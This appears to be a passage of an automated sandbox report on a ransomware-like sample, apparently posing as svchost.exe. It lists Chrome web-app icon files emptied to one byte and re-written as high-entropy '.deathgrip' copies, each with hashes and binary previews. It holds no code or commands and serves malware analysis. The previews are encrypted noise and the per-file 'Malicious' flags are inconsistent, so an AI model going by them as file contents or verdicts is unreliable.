                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\128.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8320
                                                          Entropy (8bit):7.975345801347128
                                                          Encrypted:false
                                                          SSDEEP:192:SMXEUzl4vnYzc0v39mVHaRzhfpl7L7Gc92wemYDqpYFAt:SMtzcycO3MV6Rvl59oU5
                                                          MD5:1D5972063C458E9D661A99D7BF26588E
                                                          SHA1:558AB232F87CB488A9E89B312ED5805952D05D9A
                                                          SHA-256:2E45987EF57D900108D61243BDAD248FF02F00BC9B6F4EE15EAC363219308161
                                                          SHA-512:231F8A67A41B1A8CD4277E4C52F2AB3FEDBF9980E19CDF60D86012211959C695D4F10245C87EC91B2F1AF680A851297E614012D8A4FE17A270EF7498A5FA836C
                                                          Malicious:false
                                                          Preview:.........n.7.b..t..g....Qo.....(.T...o.i... .,.-..`....S]_....p.&%.T.h.e..7x..o...Okf>.Siz.Y.I=..//...4j.R.....%...Zu{t9.J{..&%C.f.....z.(..m..'.?.......n...M...n..N..BH..y..........0.....~.}..N.....)a..u./..J.|.....E9...\..Q....`#...:W...I7...?_......r..Z...u.s.^5.~.7....3F.K.;..I........._.....C"-.#q..u.d..y.K..{.....7..CTP.pNf..\....p.%.@gE&0;.[. .u.../$A[.J..u..).F.T.....4.2.y%{.<.#f.}..T..q\..KH..*.g..n#...H..{ .GL...<..a"...M@..=hAo@(........c....:-.!S.T...Z}E....Y...Z...4Y..)..oV...Ow.}l.zQ.X.F_.Y..x...).?F...eE...mF...r..A...\...3..m...#....Av.m.....[.".M.......:f.Z. m._...Y..P"6g..2.%.....S..N..X<L_......dCs..EnJ$.-NF..m....$G?.?..........m.. .^4.4.tD...A#..:.s.....s..d..Zum.....2..X8.tE}...$/.?f....q.O|Qv.x..h.`e.9...k....|..!%p~6.z3..Z..xGVAG..@.........u.*E............."..Q..x....%D.......B.gm....).3^.w...0xg.......Z.......p&........d.:..,.O.x........J.S..wy.D....~..V.gUn.7.D......j....{......cVM0......HO>.f.lNtzH........).|..0^%.

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\192.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\192.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6048
                                                          Entropy (8bit):7.9661735786348205
                                                          Encrypted:false
                                                          SSDEEP:96:rj95JiBqbfwXh1YZwGk3/xBKXynXRT9J0Dh3y8jVXTPQchGh6epJg+iuSPZmK+Ep:X95JiBmYhpFhXRTkY8jt0chwi3RmKaE7
                                                          MD5:6F5099EC78AC8FB128DCD295D9B925F6
                                                          SHA1:7417D170896F05C8A0FECE4A31D0A587984FAF2C
                                                          SHA-256:E87250BFF65FFBAF0260F34443A9CCAEEA7D831156306202C7F605BB0CE288E1
                                                          SHA-512:EFAEEA1789C77ADBC3691665DE4FFF543D7EF146891FEC0B49DACB90C406A2A114B32E62C0052868C7744C5DC1D9F5F21B01EFDEA178955281B04720786BAF35
                                                          Malicious:false
                                                          Preview:........^i..H.zV..b.(.....uc..$....A..c.......xL.c.........d(......E.u2W.7....=Z%.U.......M......L.D..M.J.~.}..k.5.............S}.3...@.`.e..+..&...H'....'....3.......<~....9M?..a..'..b...!!A.....5.6..$..7....,....s.p.0.....~.{G.F.l-'.8..Z.F&3t>..Up..bAb.[....../.B..XT..U...1[4..@.'?<.......y@...KL..`..T.J.-..+.v..s.-.#..R.D.T....5$.[.*u..ol.|.n*..u.X...H..y..]..~.?4.........%S...,.\.:.C.Mp...g.9......s.$k.5-.\T..>.c#.N...a..d'...7Q...}3.~...."%V,:Pq..P...32..#.9.......5.4..C4....s...$.+.....[..B&2..s|..2]........F.........#....s.....8..);?..)o..uUf..(.G....?..a.....}..._....T.e.Q ...\.i..C.F..NS.~.........[.3......vd..Dz.X.oh..F3....j..b.X...N....g..R..... .....D^....;..@p.~`..t..g..2{..i........>A..J..A&.....~h...B....._....;..%.[..n9..^k...f...Y.D=...h.'.i...id......e..N...4.C.[.......<.J.2..x...We...2NNh....{p..~...sy&......x.....@Qakb.......c......h6..:.M.Q|...z.Z.u....M.;AK~../..D...Pp.G......h.EQR..B...lp.)J..6.i.D0=.Ob.....&

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):19952
                                                          Entropy (8bit):7.9904547268236765
                                                          Encrypted:true
                                                          SSDEEP:384:sMclRZoplMmhmBYBluyQzNnLd9Mw449ruEAX7xSrw+uziYpL5ad:TcU8mhm6BllUhLMwVux7srimYrad
                                                          MD5:53827C3AD28EECF4E7ACB401CEC91EC7
                                                          SHA1:76B7FB986EA61BAA8F881C7003F71B92C657C870
                                                          SHA-256:E2D127743CA7F66C84C68042609FD1A40A0210FBFEBFC35E794DE89C20E5705C
                                                          SHA-512:5D04166E7259A5FE61F0F883E95454E39761D6D4A617F1CAFE995765BA4A3F504F8C4B82DFB5B9643D7536817170EA07418CE40AD9CB91C808AB2E30A4A51934
                                                          Malicious:true
                                                          Preview:..............n.......|.("..<...%.....]l......[|..DC.m%....y..Zn...R.....].......T....N.[....-.r].Sf..v....=.N.t..i...C....=8..r.ruS...-..o8.*..w..Mo..9$.I..i...C..0.NX...t.ub..SF.C...e...#...]s....+.+.....eS&2....v.>.wo.c...#.h..lz...}.hn.mI!.....j..>U.B..l.]<z..............X8.(.....6..f{=.+.t.....N..9.P5&p.Y......w\.....!...m.,..&......6.E.....d...8*...K..../.K5K.9....N...:Lv(.iLB..p.G ..rg..l.U...mB.s.f.@.!.........24...:......O....3m..4O....$`...r...r..8.nG...>....+.Y].........T.F..@.O!.VOc... J...;.......wTu..-.k.q.V..c...H\-.....e=.j.....].f|L...7.~..L.Wp...E.J."f.|.x..6.......Y...`...M.W.1B....s.........N"....U"9.{...w}B.x..[.....h.lJ".*O.;C...j.:.>.......=...k?v..*.C>.'^...X.2h'qP.......fL.&.[........mo^ ..}ha[..T-.. ..oD"..E..TE...w..6m'..3...WA.YSW*.Jc@...N..TgEs"~G..[._..QL.D.(......iN..q.....n.u.2$ ..)_.,..0....Y....U.[6%.7.........~.m.7........"4.}....T..P%../._?>P..#P>..6]a...r.^.o.7.W&..:.>L..oSp..c....)..]....z.l....cXsJ

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\32.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\32.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2176
                                                          Entropy (8bit):7.876476777735154
                                                          Encrypted:false
                                                          SSDEEP:48:Yf8xzmPKX3QDSOzjoD+jyb3TN8IYjC3yxWlOv7tyE2xaGN:rxyyXDOfoDb3TqzElOv7d2xtN
                                                          MD5:25F9381B11A5E2BD1CFB6E025407A0AE
                                                          SHA1:B9C594EDAF0514D78C47BC30CBC077C04810B196
                                                          SHA-256:8658760F9BF831621D2A30ED7C15E6B947ADF9C51314235EFCDCB383A18731A7
                                                          SHA-512:73BA9615E206B6EEAD99583FE7A1F234F759CFC0E0090C7F21ABECABC9F8F0C8FB31E6EBD0DC619DCE9F49A54B5CC41431520E5B6370B2D2D1445712CB547986
                                                          Malicious:false
                                                          Preview:........?......X...L...*.Pi.N...S.....|...?..E......0.%.,.....L&.R...)..gx*...\...M=P..m|..+qd......#N?.,>c.JM...'@L.....GsTs.t..X_.A......+.:).....g..Y.o.m........N.9.V."...W...,Z.*.. .......e.....A.P.g..]#H..'..V....8[:..........'...z.6MoQ..1JK......Z....F..n..............}..v.^....st.....$V.o{6.q.i."..9.B#T.j..,.f.i.P^.(V...l....y.{..1l]..8.D......z.....q......R....X.+I(J..../.DG.....(.1..............m.3...,pH...Z.j.{.p.$....ao.........{.Xy4.#.]..~~..WKg......w......~o:..)k._j.........TX. ....D..Z...X....X.#......WErA.*....}].o.p..n.....Af..0..S.5....._.Y...l...!.............h=&.-..../.$R.{-.|r.......q.:...+..}.I.."f=..-.>.:...R....[..n:....l.=.....rp'R.a*M>%oaM.....AT...2......NUl.S...,...B.r!.k....t..L.i8.xhg..a.+.NG....i...D.H.._q/....<.fOa..O.P..<..M.Y.D..Y...dw.."<m..y..6......c!... ...=.I.)..p.A....]CV..rj.f[...xe.z....u.E.{5pN7Z......J.kS.>O...J..9.Q)j.....*..}Iz_.G. 1..r....}..|..W2.W.O.;.+.p..?.......Z.gV.#.u.!.7*1r(...h]....n

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\48.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\48.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\64.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\64.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4192
                                                          Entropy (8bit):7.9474537509946
                                                          Encrypted:false
                                                          SSDEEP:96:m5kr8p4+A5JRLhrwxajg9/FMrs8pAsGX+/LKufIggZZpuknj:m68pCkL/yAsg0LKK5gLbj
                                                          MD5:B00A01171ADB26C224CF5E25419B344F
                                                          SHA1:B03DDF5DA571AB7575E8A168718B1DEBADD13FA6
                                                          SHA-256:781AF47FB9955B07B2834E98CE9595642C9F41ECFB58E52B70AF23B0702F5307
                                                          SHA-512:5AC82B02AD3722EF6F21C546A43A45A38332FAC611E99EFC5AA3B2536F64419802B2C759132451BEE6065D1779A56CC6EEA30531EA75AEECD0798422613D432F
                                                          Malicious:false
                                                          Preview:.........s..Gu........7......Q.C.b..G.........23.-..~...f..@~m....n"...#...H..\..q..v.:y..L.hVp..B.k....k....S..2...,.%.f.,J...W.?.^.P.#F:c...z.....K...6..4..<.aj...;.~w...NE.NzEJ...'8..!...Y..,.....u.~.D.y\..P.1.+..NS..(.YZR...1..H.P....<....M.w.N..L..jB........4H..2.wg.W.8..(..~TH....4...3\#D..h.me....#$d....S....&L...?....J._[..G'vv.3..}...w.&. oE8cDc/.....`.......t9.<N.TA.d*.e.k.U...I@......Y%...!.D.2.D.......!#4.L.. s...6`....<...:....Z~.X....w.\...?.2m.Y.i.#..'o.....k..2.6..../.... ZU...[4....`.:5.Ow...9...V...B.M..//...,d..X...Q...Y.>...Q...b.....n.~..hOuJ.m.LLV.y/u'...7t.....;..7...`...I........g..B...8.t.....kt..1..4.:E.g.S.. 4.........p...M.h.&.../..6.'...l..KT.W........&.Z...'......7..~`.|..0....}.#..o.."HD6.....kd.....T.8..`.:...b..._.(..o#...}..1.u.,H.:.......+.*......m.....?......!5...E.>..~...`^.Z..x...w.........L.......?$.<~.@....K~....+.Hot..h...%p.{.._.U..c..O..-.?Jn!..^..Z.p...Z.....y...{....<.W...4...'m....DD...6..g.

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\96.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\96.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\128.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\128.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):10432
                                                          Entropy (8bit):7.979056564952791
                                                          Encrypted:false
                                                          SSDEEP:192:PEXl087WtbfLUyVXrJFmzxIxeVe9jZ1AlluwgDcsDUyX:c19WtbwErJFCxIbV+luXbUyX
                                                          MD5:99F9C05B417C6E95E0F11FC4A432E95B
                                                          SHA1:047543FE75738A2F0AEA7EEEAC742D11858B85E7
                                                          SHA-256:393C6CEB7C567137E15E0D5A549F646CBC6FBF7A7E949F73EE4DFC2D37CBE6A1
                                                          SHA-512:EDBF488D83217246633F46CBF516D900D3BA36858065ADE50994A9B2BDAF82270EA283A8E364FCD6CD8C60E1A05054BF5F8EBE3366F1933054210FEBECC00BB8
                                                          Malicious:false
                                                          Preview:...........O....2xj#(.<...W...C3.G.m......]-!.........=..,{j:k.m..[.k..SS....C;0...&.N.j...0f...[.mD.F".?...%.m..F4....6...n.....:."....-f...Y..K.1.!Z[.....h.-..=...o.a...1i..2V..O..N.6...=7....i..(.....N...Q..p..V........s..W.\..t....O..K@.....C.N|.,g...z.6.'......R~Y.~...8.......M...Uw3]X.v....c..H..v.!y=u)9..f.:......x...v....|....[..9.Qr9..)e..(...*.A..Z..Tw......h1c..Lu...R.......l==]....<..]..X.s@P.....p......V.#.Y.2S.n..{..w.~m..>.@.Q$...Suk...A... d.....{...4q=u..$.U.:..z.....F.e..V..a;.H<T.V.KS...3..C...[..R.w...v......md.V...z....I..I....^a.k...{C....'(F.d.+.{.y...m...<..Qt.............|*Z..."(......;.k.1B.^Ng~....~.&...6.o[.h....h.tj.}.q....Y.}.....|+...s....H.B.'-.Z...H.(;.;..~........k....#..G.:R....;!.0x.Zl7.P...e.~*a~".F=p.HK...C..."......A6.;V......~.)T......Cg].!|...MXN..i.t..c.L_....qf.[Z...P.\.k..Y...Z.F6.[Yf..Vq....T..J..S.....%.\_;y...._.M*T......X.P.'.......R........V.....k...O.s.}.-.v..X4....o....r%L.K.+.C..M.....O.

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\192.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\192.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):25696
                                                          Entropy (8bit):7.9939830646130625
                                                          Encrypted:true
                                                          SSDEEP:768:7PoUm1KxHweK4AMyD8RPniqRnISE2ziF2f6KT:zozKqeK4AM/BbZIPkCu
                                                          MD5:ACDD6349CFD14CDCE2C0BB9794F2BA19
                                                          SHA1:E6DF92F9CE29ACCB70C9BD0094B2D9465407E407
                                                          SHA-256:75951A8867C98323447D5ACD4174FC9A66CD174F96E03700A83E57413F13EA3D
                                                          SHA-512:67E0CCD00814D80E61E2BBD3E51AF8AB30F365F18FCEE2B324199FE29D791541295FEA47168FE774A7A3C24BFFB49C567DA5CE98ABF104371ECB3207CA9E56F0
                                                          Malicious:true
                                                          Preview:.........G..@.LMTZ.h.l..z.uE...P.&F+.A..8....t.............r..eb=.K.nq.+.......B...H..;H~l......a..&.BR.!T......i...V ..)..Is.S'...bTJ..f......{.x..>......?..p...OB]..n.."..8M.Z.d./....=.Yi.=........un.v.z4.....D....d{A5?....7..u........=. .....f..D...)...'b`.T .%........k.V....................K..U..J..m.....D..i....ah1~5,..!!P....M..C.4.,..^4E..]#.1.p....E...5..y..o..;..{..>?l.... [NS\..*-.)....B......Z|&...0. |...[.*...}{...h.)l..7d2..'...?E.>.]d.......b.h...;;K7....R.l..aeP..a.:.z...&....k......gL...g.X'/{..G$O..<..VwL...0..t..YD.[......z..*.V>g....O.X.A.Q...G.~.s|.....I...b.!.......~........7..NV..W....&...._...|.C$..-.N..a...g8j..Xr..D..)....YX........#.#1Y.......&>Hg1..&.!q^~.C.q6....h..*a.E.QwN.*......ky$..J`.%I.l.,..[.."j.h..Nq..k.p]K.8;Hf.^u".6t.9.#...3..1.a..!.\..3..u$..M..Z.3u.9....[D3.e*..e.f..KZn...C.".NwRZ...6J.@w..K..[WVw<UtK......*...v...A.~.t..$9l(P.(.....;.9.K...U...l.m...%.q.T.....6..C..e....g ..fe......XoJ`4.Md

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\32.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\32.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1856
                                                          Entropy (8bit):7.82970570163711
                                                          Encrypted:false
                                                          SSDEEP:48:lDTivfDcwIGArBsZ2arbNEo3UcBcgaOvlT9G8sv66PVH:lwfk7BqrJB3UQ7aO1s8KTH
                                                          MD5:A25891666B505B418900847FB816D727
                                                          SHA1:E4CC1E23435F7FC1DDF7D5AC8A5E2BB88FE46AA7
                                                          SHA-256:839D3E126EBED36377DEBEB1BF8D495349409E6607A60A56E2C8596D97F167A9
                                                          SHA-512:09ADF72C2F9CA77C7B8A8A2C404D13B54A38DB98C4019B33021743D076BB1C13D7F3547104C43D247BD6FB187E2BE89CDFC047E465857E12072A8CDEDF2A369F
                                                          Malicious:false
                                                          Preview:........i;glS..MC...8....8.M.271...cV}.V...u0.i:bu.:..$#Q..X..V...$:.xn........tp!.1......(...9.....f.,.s2.Q+..|`....-b...NFP.....4...89..+9F.Kms.L..F]P.r..)..\..-..."v.J.....C[..9"W..........+.,.S..,......../.W..DH.}.y.`..R.q.b2.})..A.p..1yRp.....}A..h@Rg`..q...yu.~.-"...~_..4b.t..Ulu........F\.y.h....WTrH..-P..\,...8.i.l..~.qR%.G..*.;..pMw,.o...'...C..|.../w...y6..)(.zv+. .]..IAC..B...j.k. .e;...y8..~.....<@z%3.....n.I.;6^;........P.L(.......:...m.$.H..]./.....&..P..4.%.h....k.t...@..t.d.....$.xJ..iw.A.u.....>(..@."......b........D.cR2%.. .8.d7.P.YF.;6|{-#.I.Y...+5:..d....w.....'y:..5I...T...,....#..!"<SD.%<.wS..=.....!.../.*..1.kj*z......3.W....Z.....6b.n....Q..P......P..... ...4......d.(.C.t.+..$.....F...T...XB9..ts....g.,..-L.A......b....0.+......vz.x.Q.6.[....U..392.m!Z.'4...tN.o.o). D...0....[.2..a..C^.&>{x[).U.._.%A.w.....f.8.!\. .^.p.QT.....l".{.[..i.0...au...v.S(.lU.C<H.G..[..t..c....$.....G.G.T..#\..l...mT...x:.Z..%....y....

